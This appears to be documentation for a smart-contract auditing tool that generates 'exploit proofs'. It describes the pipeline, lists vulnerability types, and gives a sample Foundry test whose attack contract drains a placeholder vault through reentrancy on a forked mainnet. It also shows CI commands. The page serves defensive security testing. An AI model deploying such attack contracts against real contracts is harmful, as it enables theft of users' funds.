Agnech

Exploit Proofs

Automatically generate working exploit sequences that prove vulnerabilities are real and exploitable. No false positives, only actionable findings.

Responsible Disclosure

Exploit proofs are generated for security testing only. Never use them against contracts you don't own or have authorization to test.

Overview

Bloodhound's Exploit Proof system goes beyond detecting vulnerabilities—it proves they're exploitable by generating actual transaction sequences that would succeed on a forked network.

Executable Code
Ready-to-run Foundry tests
Verified on Fork
Tested against live state
Impact Calculated
Dollar value at risk

How It Works

1

Vulnerability Detection

Static analysis identifies potential vulnerability patterns in the contract code.

2

Symbolic Execution

Path constraints are solved to find inputs that trigger the vulnerability.

3

Exploit Synthesis

Transaction sequence is generated including setup, attack, and profit extraction.

4

Fork Verification

Exploit is executed on a forked mainnet to verify it succeeds with real state.

Proof Types

Reentrancy Exploit

Generates transaction sequence to drain funds

Critical

Flash Loan Attack

Constructs profitable flash loan arbitrage path

Critical

Access Control Bypass

Finds transaction to call restricted functions

Critical

Oracle Manipulation

Calculates manipulation profit potential

High

Integer Overflow

Generates input values that cause overflow

High

Front-running Vector

Demonstrates MEV extraction opportunity

Medium

Example Proofs

Solidity
1// Generated Exploit Proof: Reentrancy Attack
2// Target: VulnerableVault.sol
3// Estimated Profit: 147.3 ETH ($442,000)
4

5// SPDX-License-Identifier: MIT
6pragma solidity ^0.8.19;
7

8import "forge-std/Test.sol";
9

10contract ReentrancyExploit is Test {
11    VulnerableVault vault;
12    AttackContract attacker;
13

14    function setUp() public {
15        // Fork mainnet at block 18500000
16        vm.createSelectFork("mainnet", 18500000);
17

18        vault = VulnerableVault(0x1234...);
19        attacker = new AttackContract(address(vault));
20

21        // Fund attacker with 1 ETH
22        vm.deal(address(attacker), 1 ether);
23    }
24

25    function testExploit() public {
26        uint256 vaultBalanceBefore = address(vault).balance;
27

28        // Execute attack
29        attacker.attack{value: 1 ether}();
30

31        uint256 profit = address(attacker).balance - 1 ether;
32

33        // Verify exploit succeeded
34        assertGt(profit, 0, "Exploit should be profitable");
35        console.log("Profit:", profit / 1e18, "ETH");
36

37        // Expected: ~147 ETH profit
38    }
39}
40

41contract AttackContract {
42    VulnerableVault vault;
43    uint256 constant ATTACK_ROUNDS = 10;
44

45    constructor(address _vault) {
46        vault = VulnerableVault(_vault);
47    }
48

49    function attack() external payable {
50        vault.deposit{value: msg.value}();
51        vault.withdraw(msg.value);
52    }
53

54    receive() external payable {
55        if (address(vault).balance >= msg.value) {
56            vault.withdraw(msg.value);
57        }
58    }
59}

CI/CD Integration

Bash
1# Run exploit proof verification in CI
2bloodhound scan contracts/ --mode apex --generate-exploits
3

4# Output includes:
5# - Foundry test files for each exploit
6# - Fork configuration
7# - Expected profit calculations
8

9# Run generated tests
10cd exploit-proofs/
11forge test --fork-url $ETH_RPC_URL -vvv
12

13# All tests should PASS (meaning exploits work)
14# This proves the vulnerabilities are real